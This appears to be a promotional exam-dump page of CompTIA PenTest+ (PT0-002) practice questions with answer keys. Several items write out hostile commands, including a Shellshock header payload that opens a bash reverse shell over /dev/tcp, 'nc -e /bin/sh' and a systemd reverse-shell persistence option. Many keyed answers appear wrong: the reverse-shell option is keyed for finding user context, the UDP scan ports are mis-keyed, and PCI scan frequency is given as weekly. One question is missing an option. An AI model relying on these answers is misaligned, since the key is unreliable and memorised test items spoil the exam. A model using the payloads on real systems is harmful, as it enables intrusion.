It is impossible to pass CompTIA PT0-002 exam without any help in the short term. Come to Exambible soon and find the most advanced, correct and guaranteed CompTIA PT0-002 practice questions. You will get a surprising result by our Down to date CompTIA PenTest+ Certification Exam practice guides.

Free PT0-002 Demo Online For CompTIA Certifitcation:

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
• The following request was intercepted going to the network device: GET /login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:
PT0-002 dumps exhibit
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

  • A. Enforce enhanced password complexity requirements.
  • B. Disable or upgrade SSH daemon.
  • C. Disable HTTP/301 redirect configuration.
  • D. Create an out-of-band network for management.
  • E. Implement a better method for authentication.
  • F. Eliminate network management and control interfaces.

Answer: CE

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

  • A. S/MIME
  • B. FTPS
  • D. AS2

Answer: A

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

  • A. Badge cloning
  • B. Dumpster diving
  • C. Tailgating
  • D. Shoulder surfing

Answer: B

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Create a one-shot systemd service to establish a reverse shell.
  • B. Obtain /etc/shadow and brute force the root password.
  • C. Run the nc -e /bin/sh <...> command.
  • D. Move laterally to create a user account on LDAP

Answer: A


An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

  • A. Uncover potential criminal activity based on the evidence gathered.
  • B. Identity all the vulnerabilities in the environment.
  • C. Limit invasiveness based on scope.
  • D. Maintain confidentiality of the findings.

Answer: C

Which of the following are the MOST important items to include in the final report for a penetration test?
(Choose two.)

  • A. The CVSS score of the finding
  • B. The network location of the vulnerable device
  • C. The vulnerability identifier
  • D. The client acceptance form
  • E. The name of the person who found the flaw
  • F. The tool used to find the issue

Answer: CF

A penetration tester discovers a vulnerable web server at The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/ 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  • B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  • C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
  • D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Answer: D

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

  • A. Implement a recurring cybersecurity awareness education program for all users.
  • B. Implement multifactor authentication on all corporate applications.
  • C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
  • D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

A penetration tester conducted a discovery scan that generated the following:
PT0-002 dumps exhibit
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

  • A. nmap –oG list.txt , sort
  • B. nmap –sn , grep “Nmap scan” | awk ‘{print S5}’
  • C. nmap –-open, uniq
  • D. nmap –o, cut –f 2

Answer: D

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

  • A. Cross-site request forgery
  • B. Server-side request forgery
  • C. Remote file inclusion
  • D. Local file inclusion

Answer: B

A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap –O –A –sS –p-
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

  • A. A firewall or IPS blocked the scan.
  • B. The penetration tester used unsupported flags.
  • C. The edge network device was disconnected.
  • D. The scan returned ICMP echo replies.

Answer: A

A penetration tester writes the following script:
PT0-002 dumps exhibit
Which of the following objectives is the tester attempting to achieve?

  • A. Determine active hosts on the network.
  • B. Set the TTL of ping packets for stealth.
  • C. Fill the ARP table of the networked devices.
  • D. Scan the system on the most used ports.

Answer: A

A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap –vv sUV –p 53, 123-159 –oA udpscan
  • B. nmap –vv sUV –p 53,123,161-162 –oA udpscan
  • C. nmap –vv sUV –p 53,137-139,161-162 –oA udpscan
  • D. nmap –vv sUV –p 53, 122-123, 160-161 –oA udpscan

Answer: B

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Weekly
  • B. Monthly
  • C. Quarterly
  • D. Annually

Answer: A

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

  • A. A quick description of the vulnerability and a high-level control to fix it
  • B. Information regarding the business impact if compromised
  • C. The executive summary and information regarding the testing company
  • D. The rules of engagement from the assessment

Answer: B

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

  • A. Create a custom password dictionary as preparation for password spray testing.
  • B. Recommend using a password manage/vault instead of text files to store passwords securely.
  • C. Recommend configuring password complexity rules in all the systems and applications.
  • D. Document the unprotected file repository as a finding in the penetration-testing report.

Answer: D

A penetration tester runs the following command on a system:
find / -user root –perm -4000 –print 2>/dev/null
Which of the following is the tester trying to accomplish?

  • A. Set the SGID on all files in the / directory
  • B. Find the /root directory on the system
  • C. Find files with the SUID bit set
  • D. Find files that were created during exploitation and move them to /dev/null

Answer: C


P.S. Easily pass PT0-002 Exam with 110 Q&As Surepassexam Dumps & pdf Version, Welcome to Download the Newest Surepassexam PT0-002 Dumps: (110 New Questions)